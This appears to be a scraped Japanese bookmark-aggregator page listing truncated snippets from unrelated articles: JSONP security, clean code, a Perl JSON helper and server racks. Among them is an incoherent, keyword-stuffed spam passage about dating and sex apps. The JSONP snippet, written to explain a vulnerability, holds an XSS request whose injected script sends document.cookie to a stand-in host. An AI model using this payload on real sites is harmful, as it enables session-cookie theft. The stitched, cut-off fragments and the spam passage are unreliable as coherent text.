Kazuho@Cybozu Labs: JSONP - データ提供者側のセキュリティについて
« E4X-XSS 脆弱性について | メイン | 「スーパー技術者争奪戦」 » 2007年01月12日 JSONP - データ提供者側のセキュリティについて JSONP のセキュリティは、ともすればインクルードする側についての議論になりがちであり、その影でインクルードされる側のリスクが見過ごされがちです。JSONP の使用にあたっては、データ提供者への XSS に注意する必要があります。脆弱な例としては、以下のようなものがあります。 GET /json.cgi/append.html?padding=%3Cscript%3Elocation='http://example.jp/'%2Bdocument.cookie%3C/script%3E HTTP/1.0 Host: example.com HTTP/1.0 200 OK Content-Type: text/javascript;
キミのコードが汚い理由 ― @IT情報マネジメント
リスト1は、同じ処理を繰り返すようなコードで初心者プログラマーがよく使う幼稚なスタイルで書かれている。必ずしも複雑ではないが、筆者には散らかっていて効率が悪く見える。リスト2の方が複雑な条件になっているが、Javaを理解していれば、かなり読みやすい。唯一疑問を抱くかもしれないとしたら、最後の「else if」の中にある条件の最初の部分だけだ。このクローズに来るということは、どちらかのプレーヤーが勝ったことを意味する。 いずれのインプリメンテーションも間違ってはいない。実際、これらはどちらも非常に小さく、つまらない例にすぎないので、これらのリストでコードがいかにクリーンか論ずるのはあまり有益ではない。ただ、何をもってインプリメンテーションがクリーンなのかについて読者の興味を深めることはできるだろう。 クリーンなコードについて扱った記事、Webサイト、書籍は多数存在する。何をもってコードをクリ
Interracial Dating Apps - Last TV
Anniversary favour ideas are many. Once you ship flower the meet and fuck sites recipient will not have a gift they could display in their house or office, however they can even love you In this image more and more people are taking interest in modern times. Strange Report Reveals The Inaccurate Practices of Cheating Wife The bride and groom can choose one fuck app of them, mix and meet examples t
DBIx::Class + Catalyst::View::JSON - ヒルズで働く@robarioの技ログ
InflateColumnを使っているときに問題があったため、修正版を新しいエントリに起こしました。 修正版:DBIx::Class + Catalyst::View::JSON(2) - ヒルズで働く@robarioの技ログ 昔書いたメモが出てきたので転載。 DBIC::ResultSet#findやDBIC::ResultSet#searchしたものをそのままJSONにしたいじゃないですか。 でもCatalyst::View::JSONにそのまま渡すとCatalystが落ちるんですよ。 なので適当に展開してくれるサブルーチンを作って使っています。 Catalyst::View::JSON以外でも使うので、アプリケーションクラスに置いています。 ### lib/MyApp.pm sub expand_dbic { my ( $c, $obj ) = @_; if ( !Scalar::U
漢のラックを極める――ラックに関するエンジニアのコダワリ
たかがラック、されどラック。ITシステムの運用と切っても切れない19インチラックの設計と運用について改めて考えてみよう。(関連特集) 皆さんはITエンジニアの仕事というと、どのようなワークスタイルを思い浮かべるだろうか? 机に座ってキーボードを叩いているとか、ミーティングを繰り返しやっているとか……そんなところかもしれない。いずれにせよ、デスクワークを思い浮かべる方が多いと思う。 しかし、機器を箱から出し入れしたり、ケーブル配線したり、物理的な作業というのも若干ではあるが存在している。今回はその中で数少ない体力作業の舞台となる「19インチラック(以下ラックと表記)」に注目してみたいと思う。ラックに対する「漢」たちのこだわりを感じとっていただければ幸いである。 ……などとかっこよく書いてみたものの、筆者は最近現場作業から遠ざかっており昔話しかできないため、今回はラックに関してのウンチクがあり
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
